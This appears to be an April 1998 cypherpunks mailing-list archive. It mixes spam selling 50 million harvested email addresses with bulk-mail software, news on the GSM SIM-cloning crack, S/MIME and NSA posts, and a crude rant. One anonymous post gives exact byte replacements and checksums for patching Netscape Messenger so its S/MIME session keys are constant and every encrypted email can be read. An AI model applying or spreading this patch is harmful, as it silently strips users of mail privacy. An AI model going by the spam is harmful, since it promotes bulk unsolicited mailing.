HUNDRED or ONE MILLION, the cost is the same - FREE.

The one thing we discovered was that  finding  enough  email  addresses  to send
your offer to can be a real headache, and  VERY TIME CONSUMING !!! Well,  we
take the pain out of collecting email addresses! In just a few days, you  could have
as  many  as  50  MILLION+  FRESH  EMAIL  ADDRESS  on  CD-ROM  ...already
formatted one per  line, ready to be loaded  into  your  email software and sent with
your sales ad !!!

ONLY $49.50, including S&H !!! THAT IS  99  CENTS  PER MILLION !!! 
<<<<<<< THIS IS THE BEST DEAL  ANYWHERE !!! >>>>>>>> 


* NOTE: These addresses are IBM format, 1 per line, text files. Sorry, no mac unless
you have SoftWindows. 

** SORRY, WE DO NOT PROVIDE TARGETED LISTS
 
*** We also include the FREE lite  version  of  mailing  software  as  a  GIFT  to  our
customer. It will help to convert  your  PC  into  a  personal broadcasting station that
reaches millions people daily.

USE THIS FORM TO ORDER
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
                                                     
                                                      ORDER FORM

Yes, send me 50 MILLION+ email addresses on CD-ROM to the following address:

Name: ___________________________________________________________ 

Address: _________________________________________________________

Apt. #: _________________

City: _____________________________________

State: ____________________________

Zip Code: _________________________

Phone: (_____)  _____________________________

E-Mail address for GIFT (mailing software):

________________________________________________________________
Please PRINT VERY CLEAR !!!


Enclosed is my payment of $49.50    _____Check   _____Money order


* Make Check/Money order payable, and mail the form to:
                   
                                             A.V.P. & ASSOCIATES

                                 14431 VENTURA BLVD., SUITE 142
                                        SHERMAN OAKS, CA 91423


** The email addresses are shipped after payment confirmation is received.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s p a c e b o y <spaceboy@indirect.com>
Date: Mon, 13 Apr 1998 03:59:04 -0700 (PDT)
To: StanSquncr <StanSquncr@aol.com>
Subject: Re: Who's the Anti-Christ this time?
In-Reply-To: <5fb7820f.35318464@aol.com>
Message-ID: <Pine.BSI.3.96.980413011159.15808A-100000@bud.indirect.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 12 Apr 1998, StanSquncr wrote: 

> The following is from an email which I received from a Christian group
> in Israel this morning. I think it makes for interesting reading ... 

I agree, completely ridiculous, but interesting nonetheless. The following
comments aren't directed at Stan, just statements on the body of the
forwarded email.

> IMPORTANT WARNING ABOUT PRINCE CHARLES 
>
> The following is a list of overwhelming evidence which supports the
> theory that Prince Charles is the biblical antichrist. Although at first
> glance, this claim may seem ridiculous, the facts speak for themselves. 

Yes, ridiculous at first glance, and second glance, and so on. What is
even more ridiculous is that these groups refer to these numerological
coincidences as "mathematical proofs" of the identity of an "antichrist".

Numerology only works if one sets up a favorable framework. Into this
framework one can place a theory or idea to be given significance,
something to be proven or believed. 

I concede that this antichrist framework is only somewhat interesting in
that it uses 'gematria' and the ancient Hebrew numeral system to "prove"
its case. Gematria is a strange sort of number magic which arose from the
fact that the numeral system was made up of the letters of the alphabet.
Early civilizations quickly realized the dangers this close relationship
of math and language could cause, and evidently is still causing to this
day. :) I'm sure the unfortunate ancient citizen whose name added to 666
would agree.

Mathematics would have moved forward much more quickly had early
mathematicians not been faced with this mixture of numbers and language.

Pat Hensley
Engineer, Mindspring Enterprises
<sig line omitted>









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 12 Apr 1998 21:43:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: S/MIME Freeware Library (SFL)
Message-ID: <199804130443.GAA08821@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



All,

The S/MIME Freeware Library (SFL) is a reference implementation of the IETF
S/MIME v3 CMS and ESS I-Ds. All source code for the SFL will be provided at
no cost and with no limitations regarding its use and distribution.
Organizations will be able to use the SFL without paying any royalties or
licensing fees.  J.G. Van Dyke and Associates, Inc, (VDA) is developing the
SFL under contract to the US Government. 

Draft versions of the SFL Fact Sheet, Software Design Description (SDD) and
Application Programming Interface (API) documents (including SFL header
files) are now available.  The Internet Mail Consortium (IMC) has
established an SFL web page at http://www.imc.org/imc-sfl/ which includes
links to the SFL documents stored on the VDA web site
(http://www.jgvandyke.com/services/infosec/sfl.html).  The IMC has also
established an SFL mail list which will be used to: distribute information
regarding SFL releases; discuss SFL-related issues; and provide a means for
SFL users to provide feedback, comments, bug reports, etc.  Please note that
all SFL-related discussion should occur on the imc-sfl mail list and not the
ietf-smime mail list.  Subscription information for the imc-sfl mailing list
is at the IMC Web site listed above.

An incomplete, "interim release" of the SFL software will be available by 31
Mar 98.  Further releases will be provided as significant capabilities are
added.  The target for completion of the SFL is June 1998. The stability of
the S/MIME v3 set of specifications is a prerequisite for meeting this
delivery goal.
  
The SFL is composed of a high-level library that performs generic CMS and
ESS processing independent of the crypto algorithms used to protect a
specific object.  The SFL high-level library makes calls to an
algorithm-independent Crypto Token Interface API.  The underlying, external
crypto token libraries will not be distributed as part of the SFL source
code.  The application developer will independently obtain these libraries
and then link them with the SFL.  This strategy will allow the SFL source
code to be freely distributed to the entire Internet community because it
does not contain software that directly implements any crypto algorithms
that are copyrighted or export controlled. 

IMC plans to add Web links pointing to freeware and commercial crypto
libraries that are compatible with SFL as they become available.


        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merchant20@apmail.com
Date: Tue, 14 Apr 1998 11:44:45 -0700 (PDT)
To: merchant20@apmail.com
Subject: AD: Accept Credit Cards - NO LEASE!
Message-ID: <199804122329.IAA19798@n21srv1.nava21.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


If you are a business owner, and need to accept credit cards for payment,
the banks don't want you to see this!

ACCEPT CREDIT CARDS RISK FREE 
RENT - NO LEASE or PURCHASE REQUIRED!

Have you been considering taking credit cards for your business but
don't want the anxiety of getting locked into a lease or saddled
with expensive equipment??  

Now there is an alternative:  RENT for $29.00 a month! 

    There's no contract. It's month by month. Cancel anytime.
    The equipment is guaranteed.   
    Home-based, internet-based and small businesses are welcome.   
    TEST IT OUT with no risk.   
    NEVER SIGN A 48 MONTH LEASE!   

We are the ONLY COMPANY in the USA that offers benefits like these:  

    * For less than ONE DOLLAR a day, you can accept credit cards.
Cancel at any time. No  ridiculous 48 month lease. No hassles 
getting approved. Rent, not lease!  

    * Doesn't matter how large or small your business is, 
nor how long  you've been in business.  

    * Approval takes ONE WEEK. Why? We hand walk the application 
through each step of the bank's process. Eliminates the standard three
to six weeks other banks take. No lost sales. 
 
    * Very low rates. If the card is swiped it is 1.79% plus $.20 per charge.
If it's non-swiped (i.e. mail-order or phone order) it's 2.5% plus $.30 each
transaction. Excellent rates- please compare.The monthly statement is $10.00. 
We guarantee we can beat anybody elses' rates. Period.  

   * $75 application fee (100% refundable if you are not approved for ANY reason.)  

You can look all over the internet, but you will never find another company
RENTING the software, or one that requires NO DEPOSIT!  

We will send you all the information you need (ABSOLUTELY FREE) so that
 you can make an informed decision, BEFORE you send us a dime!  

This information pack contains rate info, prices, etc,PLUS the application.
(Our application is only three simple sheets!)  

           TO GET YOUR INFO PACK RUSHED TO YOU:   

Simply call our 24 hour voice mailbox at (toll free) 1-888-260-5162, and
leave your name and address. We will send you the application the same
business day, at no cost to you.  If you would like an application/info pack 
immediately faxed to you, select option #2 and enter your fax# with area code.

SC Financial WANTS to help new entrepreneurs and small businesses so
don't be hesitant!  We'll do everything we can to open a merchant account
for you in the shortest amount of time and the least amount of cost to YOU!

          Remember, No obligation, No commitment whatsoever.

                       Thanks and have a great day!

                                SC Financial
                        (toll free) 1-888-260-5162







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 13 Apr 1998 09:02:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA GAK Report Coming
Message-ID: <199804131602.MAA08622@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Heather Harreld of Federal Computer Week writes that the full
NSA critique of key recovery will be on its Web site soon,
probably tomorrow:

   http://www.fcw.com

In the meantime, FCW has put online Ms. Harreld's article
on the NSA report:

   http://www.fcw.com/pubs/fcw/1998/0406/fcw-polnsa-4-6-1998.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 13 Apr 1998 09:30:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA Elint Memoir
Message-ID: <199804131630.MAA15173@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


One of the earliest reports on NSA's global electronic 
interception program appeared in Ramparts magazine
in 1972, which published a lengthy interview with a
young former NSA analyst, "U.S. Electronic Espionage:
A Memoir":

   http://jya.com/nsa-elint.htm  (84K)

James Bamford, Duncan Campbell, Nicky Hager and others 
have since confirmed what the analyst revealed then and 
greatly extended what was at the time doubted as a young 
man's anti-war exaggeration. 

NSA, according to Bamford, decided to not prosecute in the 
hope that no one would believe such astonishing claims of 
electronic violation of friends and foes. See The Puzzle Palace,
p. 334 (paper editon).

Bamford says Perry Fellwock was the name of the anonymous 
analyst, first called Winslow Peck, a pseudonym. Would anyone
happen to know where Fellwock is these days? That's on the
assumption that Fellwock is not a deeper pseudo than Peck.

What knocked me over was Fellwock saying that the location of 
the NSA training school was at Goodfellow Air Force Base, 
San Angelo, Texas, from whence this counterspy originates. 
We were told the base was mothballed, kept pickled only for
local pork. 

No doubt, NSA was never there, and "Fellwock" was just 
continuing to do his disinfo job via Ramparts.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Mon, 13 Apr 1998 13:29:36 -0700 (PDT)
To: John Young <cypherpunks@toad.com
Subject: Re: GSM cellphones cloned
In-Reply-To: <v04003a05b157e6c52077@[139.167.130.246]>
Message-ID: <3.0.5.32.19980413132949.007c3100@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:30 PM 4/13/98 -0400, John Young wrote:
>>Congrats to Lucky, and Ian, and Dave.

JY is referring to: 

http://dailynews.yahoo.com/headlines/technology/wired/story.html?s=z/reuters
/980413/wired/stories/security_4.html


Monday April 13 3:11 PM EDT 

Experts crack digital cell-phone security system

By Annaliza Savage 

SAN FRANCISCO (Wired) - A group of California-based computer experts claims
to have cracked the cryptographic security
behind the world's most popular digital cell-phone system, making it
possible to clone any phone using the GSM standard. 

The Smartcard Developer Association (http://www.scard.org) says it found
the algorithm used as the basis for the Group Special
Mobile (GSM) -- a digital cellular phone system that is used in about 80
million cell phones, primarily in Europe and Asia. Many
U.S. networks are starting to implement GSM standards, too, and this attack
was launched against a card issued by Pacific Bell. If
the group's claims are true, it could lead to a recall or reissue of the
smart cards used in GSM-based phones. 

"GSM is likely to face fraud problems of the same magnitude as analog
systems have had," said Marc Briceno, a member of the
SDA who said that analog systems have lost billions of dollars because of
cellular phone cloning. 

GSM-based cell phones work with a small card containing an electronic chip
called a Subscriber Identity Module card. The SIM
card inserts into the back of the cellular phone and contains information
that is used to identify subscribers and their account
information to the GSM network. The SIM card must be inserted into a GSM
Mobile handset to obtain access to the network,
and one of the primary benefits of the technology is that cell phones have
access to GSM networks worldwide. 

However, to clone a SIM card, a would-be cracker would have to have
physical possession of one. Unlike the cloning used in
analog systems, the crack does not yet include being able to listen in on
phone calls or obtain a SIM ID via the airwaves, although
the SDA has stated that an "over-the-air attack should not be ruled out." 

The SIM uses encryption to keep the identity of the phone secret, and the
encryption algorithm used on most of the GSM network
is called COMP128. The SDA was able to obtain the secret ciphers used by
the GSM network. After verifying authenticity, the
group turned them over to U.C. Berkeley researchers David Wagner and Ian
Goldberg, who were able to crack the COMP128
algorithm within a day. 

In 1995, Wagner and Goldberg succeeded in another high-profile hack when
they compromised the crypto code used in
Netscape's Navigator browser, which was supposed to secure credit-card
transactions. 

"Within hours they discovered a fatal flaw," said Briceno. "The attack that
we have done is based on sending a large number of
challenges to the authorization module in the phone. The key can be deduced
and recovered in about 10 hours." 

A group of hackers gathered with security and crypto experts Friday evening
at a San Francisco hacker club called New Hack
City, for a demonstration of the hack, but it never came off. Eric Hughes,
a member of the SDA and founder of the Cypherpunks
cryptography group, discussed the technical aspects of the hack, but had to
give up the planned demonstration after threats of legal
action from Pac Bell and other telephone company executives. 

It is illegal in the United States to possess cellular phone cloning
equipment, although legitimate businesses are exempted. The
telephone companies dispute SDA's claims to legitimacy. 

Wagner blames the ease of the crack on the secrecy with which the ciphers
were kept. 

"There is no way that we would have been able to break the cryptography so
quickly if the design had been subjected to public
scrutiny," said Wagner. 

The GSM standard was developed and designed by the European
Telecommunications Standard Institute, an organization that has
about 500 members from 33 countries, representing administrations, network
operators, manufacturers, service providers, and
users. 

"There's going to be an orgy of finger pointing," said Hughes, referring to
all the engineers and other people associated with the
design of the GSM network. 

The SDA say that they were able to crack the GSM network algorithm due to
weak encryption in the original design. When the
system was being designed, several European government agencies were
successful in their demands to weaken encryption
standards for government surveillance purposes. 

The SDA also claimed that the GSM security cipher that keeps eavesdroppers
from listening to a conversation called A5 was also
made deliberately weaker. The A5 cipher uses a 64-bit key, but only 54 of
the bits are actually in use -- 10 of the bits have been
replaced with zeroes. The SDA's Briceno blames government interference. 

"The only party who has an interest in weakening voice privacy is the
National Security Agency," he said. 

The SDA said that a proper demo will be taking place soon from somewhere
outside the United States. The group has also
released the source code for COMP128 and A5 for further testing
(Reuters/Wired) 


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	Why is the CIA so full of spies? 











	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous Sender <nobody@privacy.nb.ca>
Date: Mon, 13 Apr 1998 10:00:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: announce: WEAK S/MIME support for netscape messenger
Message-ID: <353f9d0a00d2344766053a58fd7fff38@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hello all,
here's a new weaken patch, this time for netscape's mail client with S/MIME support.
when you send an encrypted email, it is first encrypted with a secret key. the secret
key is then encrypted with the recipient's public key.
this patch will modify netscape's mail client so that whenever it generates a
new key, it generates an all 0x72s key.
i hope i'll find time to release an S/MIME encrypted message parser... so that
anyone can verify the info.

the magic sequence :
look for :
51 6a 00 e8 86 27 00 00 83 c4 0c 8b f8
and change with
6a 72 51 e8 b5 98 94 77 83 c4 0c 33 ff
by just changing 9 bytes, you can read all the encrypted emails ! 
like the previous sequence, this substitues a call to GenerateRandom to a memset
of course it may be possible to do something more clever, like hashing a 16 bits
random key to produce a 128 bit one ! my ex-boss is already doing that.

here's how to know if the weaken sequence works on your browser:
use the md5 in fortify distrib
md5 -r 0x400-0x32ca00,0x384a00:0x58400 ...\program\netscape.exe
that should produce
aea2aba6f731468e34fd1141f603ea20

the md5 for the whole program (netscape.exe) is :
294dfe9a5e941d12b04e10adafb0c769



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQCVAwUBNTKmWpVRLpSyKBl9AQGVAgP+Opot5VnJOouhwcS58JIdur1Q+xd2twWR
/1q0SlpfsaTi99YIgFBrDpoVhqrW+wQWJmFmGppR5wZtyMNbSm3GPaRm0m9wAOiK
vXsxS9VapEgjVh50caeTEh7e6GEwNBhNEENKbt1WvGWTrnh7K8dqiC3Pla7kmG3Q
syimJN1toCs=
=GIYU
-----END PGP SIGNATURE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCNAzUuVR4AAAEEALkjQwGKIsBT16nqJbZsWiPOH6gfRkzFav0RmWgjBu/bjDKe
PmC2aGoQV2FXFYGGnX0bHyBz8Qjewdb7aDg/MQsAXjxsSZvqxNEkXGa6bH4U/Fe8
32WBddLrScc6vikaPv0o3D8bgzr+qQM0s9FSP4n5Jb+N/y2YjJVRLpSyKBl9AAUR
tAVtYXJrb4kAlQMFEDUuVR6VUS6UsigZfQEBI9AD/RM6l/Gmw3+IPNQ1fRSFAME3
ZLoWUC6mAW5kUP0IaOFD/tXGXT+ekehcFojHpk9/QIO1mVpxr3bp97/ETZb1ZJiS
EHTEjAP/85gja/YlRubfihUUb5/MoIz94a+MWsoDB0qLDJbQ48vyNsftNDrolUFf
KUdCME7v3al/m6c0wufP
=Bnx/
-----END PGP PUBLIC KEY BLOCK-----
        






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: yarnellsnewmlm@bigfoot.com
Date: Mon, 13 Apr 1998 14:22:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Yarnell does it again...
Message-ID: <199804132122.OAA04994@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi 


	*    MARK YARNELL    *
	*    Pre-Launches    *
	*  his next BIG deal *



		21st Century Global Network, LLC
		**************************************

*	Mark Yarnell former NuSkin distributor
*	Upline magazine named Mark "The Greatest Networker in the World"
*	Inducted into the "Hall of Fame" last year.
*     	Earned hundreds of millions of  $$$  over the last few years.


		JOINS with


American Technology Group Inc, (ATG) with their patented proprietary 
IE(tm) Crystal technology once used in laundry cleaning products.

The IE(tm) Crystals will be used in a various range of personal &
home care products. 23 personal & home care products to start.

		and 

Integral Health Inc, a company comprised of 50 medical doctors
and health care specialists.

		to create

	the next $10 billion company.

Top Earners have already been on the first conference call, 
don't miss the next one. 

TUESDAY NIGHT  April 14th.  9pm EST.


*   	Please send your Phone & Fax number for Marks  
*	2 page Press Release and Conference Call schedule.

For More Information; 
mailto:yarnellsnewmlm@technologist.com?subject=Mark_Yarnell
 

----------------------------------------------------------------
To be REMOVED mailto:yarnellsnewmlm@iname.com?subject=REMOVE













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 13 Apr 1998 11:30:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: GSM cellphones cloned
In-Reply-To: <Pine.BSF.3.96.980413093122.1326A-100000@pakastelohi.cypherpunks.to>
Message-ID: <199804131830.OAA22672@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


>Congrats to Lucky, and Ian, and Dave.

Yes, indeed, for a smart hack and PR, and to John Gilmore 
for smiling out of today's NYT report on the free software 
conference last week.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Arthur <ta@dev.null>
Date: Mon, 13 Apr 1998 14:04:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Pretty Lousy Privacy PasSword--'cyherpunks' / Norman encryption
Message-ID: <35327D9A.1AD3@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP MESSAGE-----
Version: PGP for Business Security 5.5

qANQR1DDBAQDAAHJw4c31MihT+700ahfhvHTWfZDXhHdM7mCvyvIVIKCbDeTBECk
Lk4ov7qyy3GxA9N6LZMi5RPVES9+aeJFLbtgZQOhL+yOj8DOpjIEsU26PVqvZI0a
GFs0kgFkj/+PsZw9MjgCRRuvcn3jHgR7FjKLfArJqll0fzLj+jCH03rvBw81raqy
rAKxahibxJRhfur/5Dagc1lloLTdtpZHiWiyQ68k/N8WBPUMtjjAJkPtE9MVCkM1
5PfQUxbjmdAX4yLe2cUQftm88pS0uinIt2xHk6Qclh2Wnf9bV9I/7dJaFAdKo75q
A/sPTcegbLcX+46J1IvD4Lov2I5UdcnSHcA43qtwhdskQjRzy2rmk026b+NK+YkI
xEumkXXE+KIyRCtcktuEs3towgzAfjZSUmFRVs8POSwI1goR25v/BHfsYLmp2YI7
tDQALmFsNioLtTlIeCd5sKyaBiAmg5MtkyvpESCINey4f/wgmjyRRV0a0Y+2qvmU
IhaHdixcyEpm84xifAhrMaYjeCBdLjmd47eUWS/enqB9iWAXNdTEmfjcJtR+n4DA
NN0ZNytxB/dFQmRttkyF7niG4inlS+DyafDScbEACJrLDAM4sm8cjfixNBY8RH5j
GC1zVpAdWAll12ZE63h58pP0zyp5epBOWd7cTv4rMPuL27nnUidHTv0zdz1vFciK
Ce8HsgjMxRj5IFqnbiyGg+zRHlJIZL7gbw4mSjtTzw1QzK615AEi87DjgvF63mXC
EWUVMeLGQ8uG4mYUWdYuP4+7PO+tZRGfvwUk0sAYVjwwdbZsLE69O3tftiSaWB37
Sm5bvAOK1Xnm6RcsHIB3Gej5rA+8xlsCAB9qgDCqw0sCT2e42bW1fd0RoHiOwnpB
ZjPam73xiPPrR79n76D/PF1it3AP5AuQUKW9DQ+xlmrxXfbxV/ZOVSmiIbomS3NV
JrOVAR0v0VVnGX2mu5O3JvKvKS46F1/wZRKeotSkzTU9Yk8DXWU4QmDMbTp+7Fac
MR9cz9hcdaLcolLj0DanqCuPDy63WcLo+BEMlWBegn/1j6a8RufUoTD/NIa668AC
IuPcZrpnLwrk5ubgcGFr16KXSivlFhjHS+ri0280hr0DCZhsSaItv4XFJz55uhAX
HPdml+bLbidqSqjfLEeIplbewqRXdsvz/YFZubfMRYSBDLGlXVQYTOTOj6Ik8vIp
x0ernG3rLfV3uu4yDylIiWhKX3Y/ktXR6pjlPAi1kx2OV/q2AG4LWWHcb8xLD1E5
wLzwEgaCC0/8I7JSlDsGcWKAqkKwkaBWCRKT6aIUabpFnPBoWO4J1uetZ0kBr6l4
5xvpyzoS8LPzTTnzYXjYNTUjUkugTeq9iXyErlkfSN5Fo3BxPXV2+jrb3n4ZN2rC
HiOTmNwrN68lnz/XMQnm7TFq5KUzq8q1oYydOb+vJYdpRMCkIWlGAP8ToK05vMLz
q+12ru8=
=cJc9
-----END PGP MESSAGE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "C.J. Parker" <toto@sk.sympatico.ca>
Date: Mon, 13 Apr 1998 15:00:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Please Help!
Message-ID: <35328BA0.4975@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Poor little C.J. Parker will go to bed 'legal' tonight, unless some
kind soul has spare Canadian WebSpace that they can bum him, in order
to violate portions of the Canada Criminal Code by indulging in a
pathetic, whining diatribe of self-hate and victimization.

Surely there is some kind multiple-felon who is willing to give up a
small portion of their own future court time in order to help a less
fortunate individual with only a meager supply of pending criminal
charges to sleep soundly tonight, knowing that he will not have to
face the pain and humiliation that comes from being a decent, law-
abiding Canadian CypherPunk.



THE OFFICIAL C.J. PARKER HATE PAGE
------------------------------------------------
"His bad self-image and low self-esteem, and the knowledge that he had
 come by them honestly..."
~Excert from 'Space Aliens Hide My Drugs'

  KUDOS OF THE WEEK go to Revenue Canada Customs and Excise
Thug, Bill Mitschill, who legally stole the tools of freedom used by 
C.J. Parker to Author chapters of a manuscript designed to kick down
the doors of perception and lead to the violent overthrow of Perceived
MeatSpace Reality (TM).
  Parker, unknown as the Author of socially deviant UCE/SPAMs such
as "How To Make BIG $$$ Sitting At Home, Licking Your Own Dick!,"
was given a stiff dose of reality by Offal Sir MitSchill and his 
partner, who put on a blatant show of government disregard for the 
Legal and Charter Rights of its PawnIzens by not even bothering to tell 
Good Lies (TM) while widening Parker's asshole in preparation for the
beginning of the RCMP Special Greco-Olympic Games.

Congrats, Bill. A hundred points for stealing Parker's computer, and
five hundred points for gathering photocopied evidence linking Parker
to the biological warfare terrorists who rebelled against the King's
Revenue agents by dumping terroroist tea into Boston Harbor, and 
then assaulted and murdered members of the King's LEAs during the
lawful performance of their duties, while following proper Royalist
procedure.

This is a good time to remind Parker Haters (TM) across North America
that, despite our long history of applying strong negative labels to 
him for deviating from the Norm (TM) (and even stronger electroshocks 
to his brain), that current social and legal trends give us plenty of 
leeway to ignore his Legal and Charter Rights when sticking a cold, 
hard one up his butt to hammer him into line with the other NailIzens.

  The RCMP officers of the Wild, Wild Nor'West continue to lead the
way in keeping social deviants constantly on the run, no matter how far
from MeatSpace they run to try to escape.

  You will undoubtedly remember last year's article about members of
the Yorkton RCMP who planted drugs in a sting operation designed to
set a transient felon visiting C.J. Parker, and then decided that 
Parker's unconventional lifestyle made him a perfect dupe for 
prosecution, when it turned out that duuhhh Mountie's ignorance of the 
laws they are paid to enforce precluded prosecuting the original target 
of their illegal sting operation.
  Well, Parker Haters (TM) can rest assured that C.J. Parker (aka - 
Toto, TruthMonger #0, #1, #709) is currently having his ass kicked back,
from his mind's hiding space deep within the bowels of InterNet Free
Terra, to the boundaries of MeatSpace, within which his imprisoned
ass and mind can only gaze wistfully at those still living freely on 
the far side of the ElectroMagnetic Curtain which was slammed down 
around his Illegal Mind (TM) by the confiscation of his computer and 
the Digital Murder of his Sympatico WebSite.

  The Regina (can I *say* that on the InterNet?) RCMP are to be
applauded for their arrogant, oppressive reminder to Parker that their
willingness to lie on the witness stand, threated defense witnesses and
run them out of town, as well as pile mountains of bogus charges on
his head, mean that Parker's sorry ass is grass, unless he defers to the
wishes of the Mounties defending the home of the AssMan, and sits
his mind down in society's chair, straightens up his mind, and quits
mentally fidgetting.

Today's Humor:
"First He came for Adam and Eve, but there were not yet any other
humans on the earth, so there was nobody to speak up.
"Then They came for Jane and Joe Sheeple, but they were too busy
focusing on the meager piles of hay used to lure them into the feeding
pen to notice the SlaughterHaus next door, so nobody bleated.
"Then They came for the TruthMongers, and I was a TruthMonger,
so I began eating an *enormous* amount of beans..."
~Constable TruthMonger (BigLoser Inside)

(c) 1998, C.J. PARKER ("Hating myself since 1949")





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-wow-com-news-update@nmpinc.com
Date: Tue, 14 Apr 1998 04:45:18 -0700 (PDT)
Subject: WOW-COM News Update
Message-ID: <199804132259.RAA16204@Indy1.newmedium.com>
MIME-Version: 1.0
Content-Type: text/plain



====================================================
This update is sponsored by Hughes Network Systems

http://www.hns.com
====================================================
CTIA's WOW-COM named a "TOP WEB SITE" by Mobile 
Computing & Communications Magazine (2/98)

Dear WOW-COM Reader:
WOW-COM(TM) is the wireless industry's online information source, 
a FREE service of CTIA.  The world of wireless is in constant motion.
Stay on top of industry news and benefit from CTIA's analysis by
reading http://www.wow-com.com everyday.
     
If you wish to remove yourself from this mailing list, please
send an email to <majordomo@nmpinc.com> with the following
command in the body of your email message:

     	unsubscribe wow-com-news-update

If you wish to get in contact with the owner of the list, (i.e.,
if you have difficulty unsubscribing, or have questions about
the list itself) please send email to 
<owner-wow-com-news-update@nmpinc.com>.
Thank you.

INDEX:
======
1) 	FLAW FOUND IN DIGITAL WIRELESS PHONE SYSTEM
2)		FROST & SULLIVAN STUDY -- LOCAL VOICE SERVICES 
		THROWN OPEN BY TELECOM ACT OF 1996
3)		WINSTAR LAUNCHES FIXED WIRELESS MULTIPOINT 
		METROPOLITAN AREA NETWORK IN WASHINGTON, 
		D.C.
4)		LOOKING FOR A JOB IN THE WIRELESS INDUSTRY?
    
*******WIRELESS JOB OPPORTUNITY OF THE WEEK*******

http://www.wow-com.com/wworkplace/
Company: Hughes Network Systems
Job Title: 	Senior Digital Design Engineer - Hardware
Location:  	Germantown, MD - US
Job Description:   Lead digital design engineer for satellite
baseband communications hardware.  Position requires experience 
in design of digital communications subsystems such as 
modulators, demodulators, digital filters, NCOs and FEC 
encoders/decoders.   Requires BSEE (MSEE preferred) and 7-10 years 
of digital design experience with emphasis on communication circuit 
design.

***************************************************
===================================================
FLAW FOUND IN DIGITAL WIRELESS PHONE SYSTEM

http://www.wow-com.com/professional/news
Computer security engineers say they have discovered a weakness 
in GSM, the most widely used digital cellular phone technology in 
the world. Some are worried that the flaw could eventually be exploited 
to enable hackers to get free service by pretending to be legitimate
subscribers. A software developer and two graduate students say 

they can obtain important security information from GSM cellular 
phones. Click above link for the Cellular Telecommunications 
Industry Association's reaction to this announcement.

===================================================
FROST & SULLIVAN STUDY -- LOCAL VOICE SERVICES 
THROWN OPEN BY TELECOM ACT OF 1996

http://www.wow-com.com/results/professional/
Designed to create a competitive environment, the 
Telecommunications Act of 1996 was an invitation to companies 
from different market segments to vie for the same market share
in the public local wireline and wireless voice services market.  The
question now is, how well has it worked?   According to new 
strategic research from Frost & Sullivan U.S. Markets for Public 
Local Wireline and Wireless Voice Services, the 
Telecommunications Act of 1996 has created the most significant
business opportunity since the long distance market was opened for
true competition 13 years ago.  Many companies are entering the 
local wireline services market such as interexchange carriers (IXCs),
competitive access providers (CAPs), cable TV service providers 
(CATV) and utility companies, as well as wireless voice service 
providers such as cellular carriers, Personal Communications Service
(PCS) providers and wireless local loop voice service providers.

===================================================
WINSTAR LAUNCHES FIXED WIRELESS MULTIPOINT 
METROPOLITAN AREA NETWORK IN WASHINGTON, D.C.

http://www.wow-com.com/professional/news
WinStar Communications, Inc. announced today that it has 
activated a full-duplex ATM-based, point-to-multipoint (PMP) 
broadband, fixed wireless network carrying voice, data, and video 
services in Washington, D.C. The network incorporates two hub sites,
expanding to three shortly, and is providing high-speed 
telecommunications network services over multiple sectors to four 
end-user buildings. According to the company, WinStar's D.C. 
network is demonstrating all the features of a fully networked PMP 
infrastructure, including bi-directional communications on a 
bandwidth-on-demand basis.

===================================================
LOOKING FOR A JOB IN THE WIRELESS INDUSTRY? 

http://www.wow-com.com/wworkplace/
Join thousands of other wireless professionals searching for the
perfect wireless job opportunity by logging on to CTIA's Career
Center. This free online career service offers wireless industry
employment opportunities and information on leading wireless
employment and professional placement services.  The Career Center
is global, offering international job listing and direct access to the
global wireless workplace. Click above to find your next wireless job
opportunity! 
=============================
MORE WOW-COM(TM) FEATURES
=============================
WOW-COM(TM) is current: Routine Updates throughout the 
business day 
WOW-COM(TM) is insightful: CTIA's unbiased analysis 
WOW-COM(TM) is beneficial: Find products and services in
WOW-COM(TM)'s Virtual Trade Show. List open positions in the
WOW-COM(TM) Career Center, receive resumes via email and hire
qualified individuals.
